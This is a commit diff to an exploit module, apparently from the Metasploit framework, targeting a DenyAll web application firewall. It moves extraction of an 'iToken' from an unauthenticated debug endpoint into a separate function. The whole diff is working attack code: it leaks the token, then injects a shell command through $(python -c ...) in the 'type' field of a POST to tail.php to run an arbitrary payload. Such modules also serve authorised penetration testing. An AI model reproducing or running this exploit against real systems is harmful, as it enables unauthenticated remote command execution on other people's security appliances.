Moving token extraction to the seperated function

mdisec · mdisec · commit 1031d7960ad3 · 2017-09-20T10:23:32.000+03:00
diff --git a/modules/exploits/linux/http/denyall_waf_exec.rb b/modules/exploits/linux/http/denyall_waf_exec.rb
@@ -45,8 +45,8 @@ def initialize(info={})
     )
   end
 
-  def check
-    # Get iToken from unauthenticated accessible endpoint
+  def get_token
+    # Taking token by exploiting bug on first endpoint.
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
@@ -57,41 +57,42 @@ def check
     })
 
     if res && res.code == 200 && res.body.include?("iToken")
-      return Exploit::CheckCode::Appears
+      res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
     else
-      return Exploit::CheckCode::Safe
+       nil
+    end
+  end
+
+  def check
+    # If we've managed to get token, that means target is most likely vulnerable.
+    token = get_token
+    if token.nil?
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Appears
     end
   end
 
   def exploit
-    print_status("Extracting iToken value from unauthenticated accessible endpoint.")
     # Get iToken from unauthenticated accessible endpoint
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
-      'vars_get' => {
-        'applianceUid' => "LOCALUID",
-        'typeOf' => "debug"
-      }
-    })
+    print_status("Extracting iToken value")
+    token = get_token
 
-    if res && res.code == 200 && res.body.include?("iToken")
-      iToken = res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
-      print_good("Awesome. iToken value = #{iToken}")
+    if token.nil?
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
     else
-      fail_with(Failure::Unknown, "Didn't receive response from target server.")
+      print_good("Awesome. iToken value = #{token}")
     end
 
-    # Accessing to the vulnerable endpoint with valid iToken
+    # Accessing to the vulnerable second endpoint where we have command injection with valid iToken
     print_status("Trigerring command injection vulnerability with  iToken value.")
-
     r = rand_text_alpha(5 + rand(3));
 
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
       'vars_post' => {
-        'iToken' => iToken,
+        'iToken' => token,
         'tag' => "tunnel",
         'stime' => r,
         'type' => "#{r}$(python -c \"#{payload.encoded}\")"
